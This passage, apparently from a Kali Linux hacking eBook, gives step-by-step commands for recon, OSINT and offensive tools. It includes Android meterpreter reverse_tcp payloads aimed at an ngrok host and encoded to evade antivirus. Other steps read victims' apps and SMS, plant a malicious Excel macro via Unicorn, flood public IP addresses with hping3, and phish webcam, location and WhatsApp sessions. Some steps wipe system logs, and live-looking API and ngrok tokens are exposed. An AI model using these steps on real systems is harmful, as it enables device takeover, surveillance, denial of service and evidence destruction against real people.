5: Run sublist3r.py.
Code: python3 sublist3r.py
6: Sublist3r help.
Code: python3 sublist3r.py -h
7: Check website subdomains.
Code: python3 sublist3r.py -d kakarstore.com -o /home/kakar/Desktop/kakarstore.txt
Code: ./sublist3r.py -d kakarstore.com -o /home/kakar/Desktop/kakarstore.txt
8: Check subdomains in Bing.
Code: python3 sublist3r.py -d kakarstore.com -e Bing -p 80
Code: ./sublist3r.py -d kakarstore.com -e Bing -p 80
Footprinting Techniques (DNS, WHOIS)
1: Check the website's DNS records with DNS Checker.
Website: https://dnschecker.org/all-dns-records-of-domain.php
2: Check Whois Domain Lookup.
Website: https://www.whois.com/whois/
3: Check the whois domain name.
Code: whois google.com
4: Use the nslookup website to check DNS records.
Website: https://www.nslookup.io/
5: Check MX lookup.
Website: https://mxtoolbox.com/
Facebook Information Gathering
1: Update and Upgrade.
2: Install python2.
Code: apt install git python2
3: xHak9x website.
Website: https://github.com/xHak9x/fbi
4: Go to fbi directory.
Code: cd fbi
5: Install requirements.txt.
Code: pip2 install -r requirements.txt
6: Run fbi.
Code: python2 fbi.py
7: If you want help.
Code: help
8: Generate a token.
Code: token
9: Log in to your Facebook ID.
Scan WordPress Vulnerabilities
1: Scan the WordPress website.
Website: ethicalhack3r.co.uk
2: wpscan help.
Code: wpscan --help
3: Scan the website.
Code: wpscan --url http://ethicalhack3r.co.uk/ --enumerate ap,at,cb,dbe -o wpscan.txt
4: Open the wpscan.txt file.
Code: gedit wpscan.txt
5: Check WordPress Plugins vulnerabilities.
Website: https://www.exploit-db.com
6: Scan WordPress full details.
Code: wpscan --url 192.168.10.1 -e u,vp --api-token nos0chhPBUPxWWMAlAiq
7: API token website.
Fraud Exposed | How to Expose a Scammer
1: Install Fraud-Catcher.
Code:
2: Check Fraud-Catcher in lists.
Code: ls
3: Run Fraud-Catcher.
Code: python3 Fraud-Catcher.py
How to Hack WhatsApp QRL Jacking Exploitation Framework in Kali Linux
1: Download the latest version of geckodriver.
Website: https://github.com/mozilla/geckodriver/releases
2: After installation check the geckodriver in the Downloads Directory.
Code: cd Downloads
3: Unzip the geckodriver.
Code: tar -xvzf geckodriver-v0.31.0-linux64.tar.gz
4: Give permissions to geckodriver.
Code: chmod +x geckodriver
5: Follow these Codes.
A: sudo mv -f geckodriver /usr/local/share/geckodriver
B: sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
C: sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
6: Git clone geckodriver.
Code: git clone
https://github.com/OWASP/QRLJacking
7: Go to QRL Jacking.
Code: cd QRLJacking
8: Go to QRLJacker.
Code: cd QRLJacker.
9: Install all requirements.
Code: pip install -r requirements.txt --force
10: Run QRLJacker.
Code: python3 QrlJacker.py
11: Check QRLJacker list.
Code: list
12: Use grabber/WhatsApp.
Code: use grabber/whatsapp
13: Options.
Code: options
14: Set Ports.
Code: set port 4446
15: Check Options.
Code: options
16: Run it.
Code: run
How to Hack Webcam, Microphone and get Mobile Location using a Link
1: Clone Storm Breaker.
Code: git clone
https://github.com/ultrasecurity/Storm-
Breaker.git
2: Go to Strom Breaker Directory.
Code: cd Strom-Breaker
3: Install.sh.
Code: sudo bash install.sh
4: Install requirements.
Code: sudo python3 -m pip install -r
requirements.txt
5: Run Strom Breaker.
Code: sudo python3 st.py
6: For Device, Location use Get Location
Number 1.
Code: 1
7: Open Link: http://localhost:2897 in your Kali
Linux browser.
8: For ngrok uses go to the ngrok directory.
9: Run ngrok on Port 2897.
Code: ./ngrok http 2897
10: Copy the ngrok link and send it to your
mobile.
Ngrok link: https://56be-45-116-232-
42.in.ngrok.io
11: After someone clicks your link the weather
picture will appear on the screen like this and
also click on change location.
12: You will see the location and other details.
13: Open the google map link and see the
location.
DNS Enumerate
1: DNS Enumeration.
Code: dnsenum google.com
How to Enumerate SNMP
1: Find PC IP Address in CMD.
Code: ipconfig
2: Check SNMP working on PC IP Address.
Code: nmap -p 161 -sU 192.168.43.2
3: SNMP Port is 161.
4: If SNMP is open.
5: Use msfconsole.
Code: msfconsole
6: Search SNMP in msfconsole.
Code: search snmp
7: SNMP no is 25.
Code: use 25
8: Check options.
Code: show options
9: Set RHOSTS.
Code: set RHOSTS 192.168.43.3
10: RHOSTS is set.
11: Run it.
Code: run
Web Cam Hacking using CamPhish
1: Git clone CamPhish.
Code: git clone
https://github.com/techchipnet/CamPhish.git
2: Go to the CamPhish directory.
Code: cd CamPhish
3: Run CamPhish.
Code: bash camphish.sh
4: Use the Ngrok server.
Code: 1
5: Go to Live YouTube TV.
Code: 2
6: Give Youtube watch ID.
7: Open the Direct link in the browser.
8: If CamPhish wants ngrok authtoken they give
it.
NIKTO Web vulnerability scanner tool for Kali Linux
1: Find vulnerabilities.
Code: nikto -h example.com -Tuning 9
2: Save the nikto details in the file.
Code: nikto -h https://example.com -output /root/Desktop/filename -Format html
Practically Perform Vulnerability Assessment
1: Install Zaproxy.
Code: apt-get install zaproxy
2: Run Zaproxy.
Code: zaproxy
3: You can also open Zaproxy manually from the search.
4: Update all packages.
5: Go to Automated Scan.
6: Paste the website URL into the URL to Attack.
7: You can use the testphp vulnweb website for penetration testing or scanning.
Website: http://testphp.vulnweb.com/
8: Click on Attack.
9: Tick the "Use ajax spider" option.
10: Add AJAX Spider, Active Scan, and Fuzzer.
11: You can check vulnerabilities in Alerts.
MAC Changer in Shell Scripting
1: Check Mac Address.
Command: ifconfig
Command: macchanger -s eth0
2: The ether value is the MAC address.
Code: 08:00:27:ed:29:83
3: Bring eth0 down.
Code: ifconfig eth0 down
4: Change Mac Address (I change 83 into 84).
Code: ifconfig eth0 hw ether 08:00:27:ed:29:84
5: Start eth0.
Code: ifconfig eth0 up
6: Check Change Mac Address.
Code: ifconfig
7: This MAC change is not permanent; you have to repeat it whenever you start Kali Linux.
8: Create a Mac Changer Permanent file.
Code: gedit Mac.sh
9: Paste this code into gedit Mac.sh.
Code:
#!/bin/bash
# Bring the interface down, set the new MAC address, bring it back up.
ifconfig eth0 down
ifconfig eth0 hw ether 08:00:27:ed:20:83
ifconfig eth0 up
# Show the result.
ifconfig
OR
#!/bin/bash
# Read the new MAC address from standard input.
read -r mac
ifconfig eth0 down
ifconfig eth0 hw ether "$mac"
ifconfig eth0 up
# Show the result.
ifconfig
10: Run Mac.sh.
Code: ./Mac.sh
11: Enter Mac Address then run.
08:00:27:ed:20:83
12: Give permissions to Mac.sh.
Code: chmod +x Mac.sh
13: Run Mac.sh.
Code: ./Mac.sh
14: Check the Mac Address change.
Command: ifconfig
Command: macchanger -s eth0
15: Change Mac Address Manually (Not Valid).
Command: macchanger -r eth0
16: Mac Changer Lists.
Command: macchanger -l
17: Save the Mac Changer list in a file.
Command: macchanger -l > vendor.txt
18: Show Mac Changer lists.
Command: cat vendor.txt
19: Check Mac Changer list records.
Command: wc -l vendor.txt
20: Find out records.
Command: shuf -n 1 vendor.txt
21: Show only Mac Address.
Command: shuf -n 1 vendor.txt | awk '{ print $3 }'
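A stricter take on the Mac.sh script above, added here as an example and not part of the original eBook: it validates the address before touching the interface, refuses multicast addresses, and uses `ip link` in place of `ifconfig`. The function names and the two-argument usage are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the eBook): Mac.sh with input validation.
# Function names and the interface argument are assumptions of this example.

# One hex octet, written as a shell pattern.
HEX2='[0-9A-Fa-f][0-9A-Fa-f]'

# Return 0 if $1 is exactly six colon-separated hex octets.
valid_mac() {
    case "$1" in
        $HEX2:$HEX2:$HEX2:$HEX2:$HEX2:$HEX2) return 0 ;;
        *) return 1 ;;
    esac
}

# Return 0 if the address is unicast: bit 0 of the first octet is clear.
# Call only after valid_mac has accepted the value.
is_unicast() {
    [ $(( 0x${1%%:*} & 1 )) -eq 0 ]
}

# Return 0 if the locally administered bit (0x02) of the first octet is set.
is_locally_administered() {
    [ $(( 0x${1%%:*} & 2 )) -ne 0 ]
}

# Validate the address, then apply it. Returns 2 for a malformed address
# and 3 for a multicast address, in both cases before the interface is touched.
set_mac() {
    _iface="$1"
    _mac="$2"
    if ! valid_mac "$_mac"; then
        echo "Invalid MAC address: $_mac" >&2
        return 2
    fi
    if ! is_unicast "$_mac"; then
        echo "Multicast address rejected: $_mac" >&2
        return 3
    fi
    if ! is_locally_administered "$_mac"; then
        echo "Note: $_mac uses a vendor (OUI) prefix, not a locally administered one" >&2
    fi
    ip link set dev "$_iface" down &&
        ip link set dev "$_iface" address "$_mac" &&
        ip link set dev "$_iface" up &&
        ip -brief link show dev "$_iface"
}

# Usage: sudo ./Mac.sh eth0 02:00:27:ed:20:83
if [ "$#" -eq 2 ]; then
    set_mac "$1" "$2"
fi
```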
How to Enumerate NetBIOS
1: Copy the IP Address from Metasploitable 2.
Code: ifconfig
2: Check IP Address is up or down.
Code: ping 192.168.43.235
3: Scan IP Address.
Code: nmap 192.168.43.235 -sV -vv -p 130-140
4: Port 139 is open.
5: Run port 139 which is open.
Code: nmap 192.168.43.235 -vv -p 139 --script=nb*
OR
Code: nbtscan 192.168.43.235 -v
Code: nbtscan 192.168.43.235 -v -h
How to Enumerate NFS (Network File System)
1: Use Metasploitable Machine for IP Address.
Code: ifconfig
2: Find NFS.
Code: nmap -sT -sV -vv 192.168.43.235
3: NFS may be present.
4: Scan Port 111.
Code: nmap -p 111 192.168.43.235 --script=nfs*
5: Create a folder on the Desktop.
6: To find the exact location, drag the NFS folder and drop it into the terminal.
7: Mount it.
Code: mount -t nfs 192.168.43.235:/ /home/kakar/Desktop/NFS
8: Open the NFS folder to see all details.
E: dpkg was interrupted, you must manually run 'sudo dpkg --configure -a' to correct the problem.
1: Paste this code into the terminal.
Code: sudo dpkg --configure -a
Shared Clipboard Text Windows to Kali Linux host in Virtual Box | Copy, and Paste Windows to Kali Linux
1: Follow these steps in the virtual box.
How to avoid anonymity leaks? Stay anonymous
1: You can download all dependencies with the following command or check if they are up to date.
Code: sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager
2: Clone whoami.
Code: git clone https://github.com/owerdogan/whoami-project.git
3: Go to the whoami directory.
Code: cd kali-whoami
4: Install using the Makefile.
Code: sudo make install
5: whoami help.
Code: sudo kali-whoami --help
6: Start whoami.
Code: sudo kali-whoami --start
7: If you want to activate features select the number and enter it.
Code: 1 or 2,3,4,5 etc
8: After the selection of features, you will see the tick mark.
9: If you want to disable features just type the number and enter it.
10: After selecting all features just press Enter to start it.
11: Check whoami status.
Code: sudo kali-whoami --status
12: Stop whoami.
Code: sudo kali-whoami --stop
Remotely Control an Android Device
1: Git clone AndroRAt.
Code: git clone
https://github.com/karma9874/AndroRAT.git
2: Go to the AndroRAT directory.
Code: cd AndroRAT
3: Install requirements.
Code: pip3 install -r requirements.txt
email, and domain using OSiNT Tool
1: Git clone Profil3r.
Code: git clone https://github.com/MrNonoss/Profil3r-docker.git
2: Go to the Profil3r directory.
Code: cd Profil3r-docker
3: Install packages.
Code: sudo python3 setup.py install
How to Create a Remote Access Trojan (RAT)
1: Clone FatRat.
Code: git clone
https://github.com/screetsec/TheFatRat.git
2: Go to the FatRat directory.
Code: cd TheFatRat
3: Give execute permissions to setup.sh.
Code: chmod +x setup.sh
4: Run setup.sh.
Code: ./setup.sh
5: Click on Install Backdoor-Factory from Kali
Repository.
Code: 2
6: Give execute permissions to chk_tools.
Code: chmod +x chk_tools
7: Check software if not installed
Code: ./chk_tools
Enumeration - How to Enumerate SMTP
1: Use Metasploitable2 IP Address.
2: Scan the IP Address and find SMTP Port.
Code: nmap -sT -sV 192.168.43.235
3: Here the SMTP port is open.
4: Scan SMTP Port.
Code: nc -nv 192.168.43.235 25
Or
Code: telnet 192.168.43.235 25
5: Mention Gmail Address.
Code: VRFY simple@gmail.com
6: Scan SMTP.
Code: nmap -p 25 192.168.43.235 -sC
How to Change Private IP using shell Program
1: Create an IPc.sh file.
Code: gedit IPc.sh
2: Check current IP.
Code: ifconfig
3: Change IP Manually.
Code: ifconfig eth0 192.168.78.140
4: Check IP now.
Code: ifconfig
5: Change IP permanently.
Code:
#!/bin/bash
# Read the new IP address from standard input and assign it to eth0.
read -r ip
ifconfig eth0 "$ip"
ifconfig
6: Save the file.
7: Give execute permissions to the IPc.sh file.
Code: chmod +x IPc.sh
8: Change IP.
9: If you want only an IP Address.
10: Open the IPc.sh file.
Code: gedit IPc.sh
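Paste this code:
#!/bin/bash
# Assign the IP read from standard input, then show only the inet lines.
read -r ip
ifconfig eth0 "$ip"
ifconfig | grep inet
Or
#!/bin/bash
# Assign the IP, then show only the line that contains it.
read -r ip
ifconfig eth0 "$ip"
ifconfig | grep -F "$ip"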
11: Save it.
12: Run the IPc.sh file.
Code: ./IPc.sh
Clear All Logs from Windows and Linux
1: For windows Download SourceForge.
Website:
https://sourceforge.net/projects/clearlogs/
2: For Linux Go to /var/log.
Code: cd /var/log
3: Check all logs.
Code: ls
4: Open logs.
Code: pluma file name
Example: pluma macchanger.log
5: If you want to remove logs.
Code: rm -r logs name
6: Clear all logs with one click.
Code: rm -rf *
Monitor Mode Switcher Using Shell Scripting
1: Create a monitor.sh file.
Code: gedit monitor.sh
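2: Write this code.
Code:
#!/bin/sh
echo "For monitor mode press 1"
read -r no
# Put wlan0 into monitor mode and show the wireless configuration.
monit() {
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
    iwconfig
}
# Compare as a string so empty or non-numeric input is handled cleanly.
if [ "$no" = "1" ]
then
    echo "Switching to Monitor Mode"
    monit
else
    echo "Wrong Input"
fi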
3: Give execute permissions.
Code: chmod +x monitor.sh
4: Run monitor mode.
Code: ./monitor.sh
5: Type 1.
How to Remove Rootkits from Our Devices
1: chkrootkit help.
Code: chkrootkit --help
2: Run chkrootkit.
Code: chkrootkit
3: Use rkhunter.
Code: rkhunter
4: Run rkhunter.
Code: rkhunter -c
Advanced Hacking with Nmap
1: Scan Website.
Code: nmap -sV testphp.vulnweb.com -O --script vuln
How to Remove Cache Files
1: Install bleachbit.
Code: apt-get install bleachbit
2: Open bleachbit (as root).
3: Select Cache files and clear them.
How to Create Payload
1: Find msfvenom payloads.
Code: msfvenom -l payloads
2: Copy android/meterpreter/reverse_tcp from
payload lists.
Code: android/meterpreter/reverse_tcp
3: Generate Payloads.
Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=192.168.43.247 LPORT=8888 >
walikhankakar.apk
4: Here Payload is created now.
5: Go to Virus Total Website.
Website:
https://www.virustotal.com/gui/home/upload
6: Insert apk file and check the virus in apk file.
7: Virus detected by Anti-Virus software.
8: Check msfvenom encoders lists.
Code: msfvenom -l encoders
9: Use php/base64 encoder.
Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=192.168.43.247 LPORT=8888 >
walikhankakar.apk -e php/base64
10: Check apk file again on Virus total website.
11: Know Anti-Virus cannot detect payloads in
apk files.
How Hackers Hack Your Phone Remotely
1: Go to the Ngrok website.
Website: https://ngrok.com/
2: For signing, you can use Temp mail.
Website: https://temp-mail.org/en/
3: Download Ngrok for Linux and extract them.
4: After installation of Ngrok copy Connect your
account authtoken code.
The code looks like this: ngrok config add-
authtoken
8GyRtVj6X4960jgmve1LdcMC9sVL_8d9e03Cank
p
5: Execute Ngrok.
Code: ./ngrok authtoken
10dsJV5diughoicidcMC9sVL_0d9onGCankp8GyR
tnvlie
6: Start Ngrok.
Code: ./ngrok tcp 5252
7: Copy 0.tcp.in.ngrok.io.
8: Create payload.
Code: msfvenom -p
android/meterpreter/reverse_tcp
LHOST=0.tcp.in.ngrok.io LPORT=13240 >
apkname.apk
9: Here apk payload is created.
10: Start msfconsole.
Code: msfconsole
11: Use exploit/multi/handler.
Code: use /exploit/multi/handler
Code: set payload
/android/meterpreter/reverse_tcp
Code: set LHOST 127.0.0.1
Code: set LPORT 5252
Code: set ExitOnSession false
12: Check payload options.
Code: show options
13: Run apk file.
Code: run -j or exploit -j
14: Check sessions.
Code: sessions -i
15: Select sessions.
Code: sessions -i 1
16: Check Victims apps.
Code: app_list
17: For more details check help.
Code: help
18: For apk sharing, you can use your own
Whatsapp or WeTransfer website.
Website: https://wetransfer.com/
: Check SMS.
Code: dump_sms
How to Perform DoS Attack
1: Copy the IP Address from Metasploitable2.
Code: ifconfig
2: use higping3.
Code: hping3 -S 142.250.181.179 -a
192.168.43.247 -p 22 --flood
3: 142.250.181.179 is the target IP (Kali Linux).
4: 192.168.43.247 Attacker IP (Website).
5: Check metasploitable2 usage.
Code: top
Install and use GR-GSM
1: Go to kali tweaks.
Code: kali-tweaks
2: Go to Network Repositories.
3: Select experimental.
4: Apply and ok it.
5: Quit it.
6: Install gr-gsm.
Code: apt install gr-gsm
7: You can use gr-gsm devices.
8: Buy Now on Amazon
rtl-sdr: https://amzn.to/3U3SBzq
rtl-sdr: https://amzn.to/3NxCyaP
9: Connect to the system.
Code: lsusb
10: Start gr-gsm.
Code: sudo grgsm_livemon
11: For frequency set it.
Code: sudo grgsm_livemon -f 02935
Password Protect GRUB Boot Loader
1: Generate a Password.
Code: grub-mkpasswd-pbkdf2
2: Enter Password.
Password: Kakar
3: Here Hash is generated.
4: Copy Hash.
5: Go to the grub file.
Code: nano /etc/grub.d/00_header
6: Go to the line grub_lang=`echo $LANG | cut -d . -f 1`.
Code: grub_lang=`echo $LANG | cut -d . -f 1`
7: Paste this code.
Code:
cat <<EOF
set superusers="kakar"
password_pbkdf2 kakar grub.pbkdf2.sha512.10000.967170B5367FB0451E7CB8AC3>
EOF
8: Update changes in the grub folder.
Code: sudo update-grub
9: Reboot the system.
Code: sudo reboot
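A check worth running between editing the file and rebooting, added here as an example and not part of the original eBook: it confirms that every superuser has a complete `password_pbkdf2` hash, so a hash cut short by the editor's line display is caught before the next boot. The function names are assumptions, and the 128-hex-digit salt and hash lengths assume `grub-mkpasswd-pbkdf2` was run with its default options.

```shell
#!/bin/sh
# Added example (not from the eBook): sanity-check GRUB password lines.
# Function names are assumptions; lengths assume grub-mkpasswd-pbkdf2 defaults.

# A complete hash is grub.pbkdf2.sha512.<iterations>.<salt>.<hash>,
# with salt and hash each written as 128 upper-case hex digits.
valid_pbkdf2_hash() {
    printf '%s\n' "$1" |
        grep -Eq '^grub\.pbkdf2\.sha512\.[0-9]+\.[0-9A-F]{128}\.[0-9A-F]{128}$'
}

# check_grub_auth FILE
# FILE is /etc/grub.d/00_header or the generated grub.cfg.
# Prints one line per finding and returns 0 only if nothing is wrong.
check_grub_auth() {
    _file="$1"
    _rc=0
    _users=$(sed -n 's/^[[:space:]]*set superusers="\([^"]*\)".*/\1/p' "$_file")
    if [ -z "$_users" ]; then
        echo "no 'set superusers=' line found"
        return 1
    fi
    # superusers may list several names separated by commas, semicolons or spaces.
    for _u in $(printf '%s' "$_users" | tr ',;' '  '); do
        _hash=$(awk -v u="$_u" '$1 == "password_pbkdf2" && $2 == u { print $3 }' "$_file")
        if [ -z "$_hash" ]; then
            echo "superuser '$_u' has no password_pbkdf2 line"
            _rc=1
        elif ! valid_pbkdf2_hash "$_hash"; then
            echo "hash for '$_u' is malformed or truncated"
            _rc=1
        fi
    done
    # A plain 'password' line stores the password in clear text.
    if grep -Eq '^[[:space:]]*password[[:space:]]' "$_file"; then
        echo "plaintext 'password' line present"
        _rc=1
    fi
    return "$_rc"
}

# Usage: sudo ./check_grub_auth.sh /etc/grub.d/00_header
if [ "$#" -eq 1 ]; then
    check_grub_auth "$1"
fi
```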
What is Podman? Use Kali Linux on Windows 11
1: Go to Podman Github.
Website: https://github.com/containers/podman/releases
2: Download the Podman file.
3: Install in windows.
4: Install Podman.
5: Install the Podman machine in the command prompt.
Code: podman machine init
6: Check the Podman machine list in the command prompt.
Code: podman machine list
7: Start the Podman machine in the command prompt.
Code: podman machine start
8: Open kali Linux in Podman.
Code: podman run --tty --interactive docker.io/kalilinux/kali-rolling
How Hackers can own your system
1: Clone Unicorn.
Code: git clone
https://github.com/trustedsec/unicorn.git
2: Go to the Unicron directory.
Code: cd unicorn
3: Unicorn help.
Code: python3 /usr/share/unicorn-
magic/unicorn.py --help
4: Set Attacker (System) IP.
Code: ifconfig | grep inet
IP: 192.168.43.247
5: Create payload.
Code: python3 /usr/share/unicorn-
magic/unicorn.py
windows/meterpreter/reverse_http
192.168.43.247 80 macro
6: Here is the unicorn payload generated.
7: Start msfconsole.
Code: sudo msfconsole -r unicorn.rc
8: Copy the powershell_attack.txt folder and
paste it into ms excel.
9: Open VBA in ms excel.
Key: Alt + F11
10: Go to Insert = Module and paste the
powershell_attack.txt folder.
11: Close the VBA and save the file.
12: Check sessions.
Code: sessions
13: Open sessions.
Code: sessions -i 1
14: Load extension.
Code: load stdapi
15: System info.
Code: sysinfo
CSI Installation | A Perfect OS for Cyber Security and Cyber Crime Investigation
1: Go to the CSI Linux website.
Website: https://csilinux.com/download
2: Open CSI Linux in Virtual Box Machine manually.
3: Click on import.
4: Start CSI Linux and Enjoy it.
5: CSI Linux Default Password.
Code: csi
Setup Web Pentesting Lab for Bug Hunting
1: Update Packages.
Code: apt update
2: Set Pentesting Lab for Bug Hunting.
Code: apt install kali-linux-labs
3: Start dvwa.
Code: dvwa-start
4: DVWA login.
Code: dvwa
5: DVWA Password.
Code: dvwa
6: DVWA database setting.
Code: /etc/dvwa/config/config.inc.php
7: Vulnerable Web Application Admin.
Code: admin
8: Vulnerable Web Application Password.
Code: password
9: How to stop DVWA.
Code: dvwa-stop
10: Start juice-shop.
Code: juice-shop
11: How to stop juice-shop.
Code: juice-shop-stop
How to Perform DDoS Attacks
1: Copy Website IP (Victim IP).
Code: 192.168.192
2: Start DDoS Attack on the website.
Code: hping3 --flood --rand-source
185.151.30.105
Sock Puppet hackers technique for OSINT
1: Open Linux case.
2: Start a case.
3: Start New Case.
4: Click on Sock Puppet Generator.
5: Now the sock puppet is generated.
6: Fake Name Generator Website.
Website: https://www.fakenamegenerator.com/
7: For Fake Pictures.
Website: https://thispersondoesnotexist.com/
8: Anonymous Email.
Website: https://proton.me/
How to install Spiderfoot
1: Install Spiderfoot.
Code: git clone https://github.com/smicallef/spiderfoot.git
2: Go to the Spiderfoot directory.
Code: cd spiderfoot
3: Install Spiderfoot packages.
Code: pip install -r requirements.txt
4: Start Spiderfoot.
Command: python3 ./sf.py -l 127.0.0.1:5001
Command: spiderfoot -l 127.0.0.1:1000
5: Copy the Spiderfoot link and paste it into the browser.
Link: http://127.0.0.1:5001/
Link: 127.0.0.1:1000
6: Scan your website.
7: Spiderfoot help.
Command: spiderfoot -h
How to find social media accounts by username
1: Install sherlock.
Code: git clone https://github.com/sherlock-project/sherlock.git
2: Go to the sherlock directory.
Code: cd sherlock
3: Install sherlock requirements.
Code: python3 -m pip install -r requirements.txt
4: Find social media users.
Code: python3 sherlock kakarstore
5: Protect your privacy and search users.
Code: python3 sherlock -t kakarstore
6: Scan the username in depth.
Code: python3 sherlock --print-all kakarstore
Mapping Social Media Profiles with Facial Recognition using Social Mapper
1: Install Social Mapper.
Code: git clone https://github.com/Greenwolf/social_mapper.git
2: Install geckodriver check page number 152.
3: Copy geckodriver.
Code: cp geckodriver /usr/bin/
4: Install these packages.
Code: sudo apt-get install build-essential cmake
Code: sudo apt-get install libgtk-3-dev
Code: sudo apt-get install libboost-all-dev
5: Go to the Social Mapper directory.
Code: cd social_mapper/setup/
6: Install requirements.
Code: python3 -m pip install --no-cache-dir -r requirements.txt
7: Check Mac packages.
Code: mac setup-mac.txt
8: Open the social mapper file.
Code: nano social_mapper.py
9: Fill in the social media account details in the social mapper file.
10: Scan Pictures.
Code: python social_mapper.py -f imagefolder -i /home/kakar/social_mapper/Input-Examples/imagefolder/ -m fast -tw
Trape: easily track location, IP, OS, Browser of people, and browser hooking
1: Install Trape.
Code: git clone
https://github.com/jofpin/trape.git
2: Go to the Trape directory.
Code: cd trape
3: Install trape requirements.
Code: pip install -r requirements.txt
4: Run trape.
Code: python3 trape.py --url
http://kakarstore.com --port 8080
5: Open Your Access key in the browser.
Recon-ng Web Reconnaissance Framework | Trace location, Pushpin, Images
1: Start Recon-ng.
Code: recon-ng
2: Check modules.
Code: show modules
3: Check the API keys list.
Code: keys list
4: Check recon-ng help.
Code: help
5: Check workspaces.
Code: show workspaces
6: Create workspaces.
Code: workspaces create kakarstore
7: Check the workspaces list.
Code: workspaces list
HTTrack website copier: How to clone any website | extract website data
1: Start HTTrack.
Code: httrack
2: Write the project name.
3: Base path (return=/root/websites/) means (Where to save the files).
Code: /home/kakar/Desktop/
4: Add a website.
Code: https://www.kakarstore.com
How to easily setup web Pentesting lab on localhost for bug bounty
1: Install PentestLab.
Code: git clone https://github.com/eystsen/pentestlab.git
2: Go to the PentestLab directory.
Code: cd pentestlab
3: Install Docker.
Code: sudo apt install docker.io
4: Check PentestLab list.
Code: ./pentestlab.sh list
5: Set up vulnerablewordpress on localhost.
Code: ./pentestlab.sh start vulnerablewordpress
6: Setup procedures are the same.
7: If you want to stop the vulnerablewordpress setup.
Code: ./pentestlab.sh stop vulnerablewordpress
8: Start bwapp.
Code: ./pentestlab.sh start bwapp
9: Start webgoat8.
Code: ./pentestlab.sh start webgoat8
10: Start dvwa.
Code: ./pentestlab.sh start dvwa
11: You can start dvwa on Public IP.
Code: ./pentestlab.sh startpublic dvwa
12: You can also set up dvwa on other IP Addresses and ports.
Code: ./pentestlab.sh startpublic dvwa 192.168.23.43 8080
Hollywood-style terminal emulator
1: Download eDEX-UI.
Website: https://github.com/GitSquared/edex-ui
2: Go to the Downloads directory.
3: Give permissions to eDEX-UI.
4: Tick "Allow this file to run as a program".
5: Start eDEX-UI.
Fully Anonymize Your System with Tor Network Gateway using Nipe
1: Install Nipe.
Code: git clone https://github.com/htrgouvea/nipe.git
2: Go to the Nipe directory.
Code: cd nipe
3: Install libs and dependencies.
Code: sudo cpan install Try::Tiny Config::Simple JSON
4: Install nipe.pl.
Code: ./nipe.pl install
5: Start nipe.pl.
Code: perl nipe.pl start
6: Check nipe.pl status.
Code: perl nipe.pl status
7: If you want to change your IP Address.
Code: perl nipe.pl restart
8: If you want to stop nipe.pl.
Code: perl nipe.pl stop
METADATA (Hidden information of website download public documents)
1: Install Metagoofil.
Command: git clone https://github.com/laramies/metagoofil.git
Command: apt install metagoofil
2: Scan hidden information.
Command: metagoofil -d kakarstore.com -t doc,pdf,xls -l 100 -n 20 -o /home/kakar/Desktop/kakarstorefiles -f
Create a static name for the dynamic IP address for access localhost from anywhere
1: Go to Duck DNS official website and sign in.
Website: https://www.duckdns.org/
2: Create subdomains.
3: Go to the Install menu.
4: In OS select Linux cron.
5: If your linux install is running a crontab, then you can use a cron job to keep updated.
Command: ps -ef | grep cr[o]n
6: If this returns nothing - then go and read up on how to install cron for your distribution of linux.
Also confirm that you have curl installed, test this by attempting to run curl.
Command: curl
7: If this returns a command not found like error - then find out how to install curl for your distribution.
Otherwise, get started and make a directory to put your files in, move into it and make our main script.
8: Make a Duck DNS directory.
Command: mkdir duckdns
9: Go to the Duck DNS directory.
Command: cd duckdns
10: Create a file.
Command: nano duck.sh
11: Now copy this text and put it into the file (in nano you hit the I key to insert, ESC then u to undo) you must change your token and domain to be the one you want to update.
You can pass a comma-separated (no spaces) list of domains.
You can if you need to hard code an IP (best not to - leave it blank and we detect your remote ip).
Hit ESC then use the arrow keys to move the cursor x deletes, and I put you back into insert mode.
Command: echo url="https://www.duckdns.org/update?domains=kakarstore&token=4ca4010f-785e-46f2-9ef8-742b80976918&ip=" | curl -k -o ~/duckdns/duck.log -K -
12: Justify this file.
Command: Ctrl + j
13: Save it.
Command: Ctrl + o
Command: Enter
Command: Ctrl + x
14: Now make the duck.sh file executable by its owner only, since it contains your token.
Command: chmod 700 duck.sh
15: We will be using the cron process to make
the script get run every 5 minutes.
Command: crontab -e
16: Copy this text and paste it at the bottom of
the crontab.
Command: */5 * * * * ~/duckdns/duck.sh >/dev/null 2>&1
17: Save the file.
Command: Ctrl + o
Command: Enter
Command: Ctrl + x
18: Test the script.
Command: ./duck.sh
19: If it is KO check your Token and Domain are correct in the duck.sh script.
Command: cat duck.log
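A variant of duck.sh that keeps the token out of the script and checks the reply, added here as an example and not taken from the eBook or from Duck DNS: it reads the token from a file that must not be readable by group or others, drops `-k` so the TLS certificate is verified, and treats any reply other than OK as a failure. The file locations and function names are assumptions, as is the UUID shape of the token (it matches the token shown above).

```shell
#!/bin/sh
# Added example (not from the eBook): duck.sh with a private token file,
# TLS verification and a reply check. Paths and names are assumptions.
DUCK_DIR="${DUCK_DIR:-$HOME/duckdns}"
TOKEN_FILE="${TOKEN_FILE:-$DUCK_DIR/token}"

# Return 0 only for a regular file with no group/other permission bits.
token_file_is_private() {
    [ -f "$1" ] || return 1
    case "$(ls -ld "$1")" in
        ????------*) return 0 ;;
        *) return 1 ;;
    esac
}

# Comma-separated subdomain labels, no spaces, nothing that could add
# extra query parameters.
valid_domains() {
    case "$1" in
        '' | *[!A-Za-z0-9,-]* | ,* | *, | *,,*) return 1 ;;
        *) return 0 ;;
    esac
}

# UUID-shaped token: 8-4-4-4-12 hex digits.
valid_token() {
    _h='[0-9A-Fa-f]'
    _h4="$_h$_h$_h$_h"
    case "$1" in
        $_h4$_h4-$_h4-$_h4-$_h4-$_h4$_h4$_h4) return 0 ;;
        *) return 1 ;;
    esac
}

# An empty ip lets Duck DNS use the address the request comes from.
build_url() {
    printf 'https://www.duckdns.org/update?domains=%s&token=%s&ip=%s' "$1" "$2" "$3"
}

# Duck DNS answers with the literal text OK or KO.
reply_ok() {
    [ "$1" = "OK" ]
}

update_duckdns() {
    _domains="$1"
    valid_domains "$_domains" || { echo "bad domain list" >&2; return 2; }
    token_file_is_private "$TOKEN_FILE" ||
        { echo "token file missing or readable by others: $TOKEN_FILE" >&2; return 3; }
    _token=$(cat "$TOKEN_FILE")
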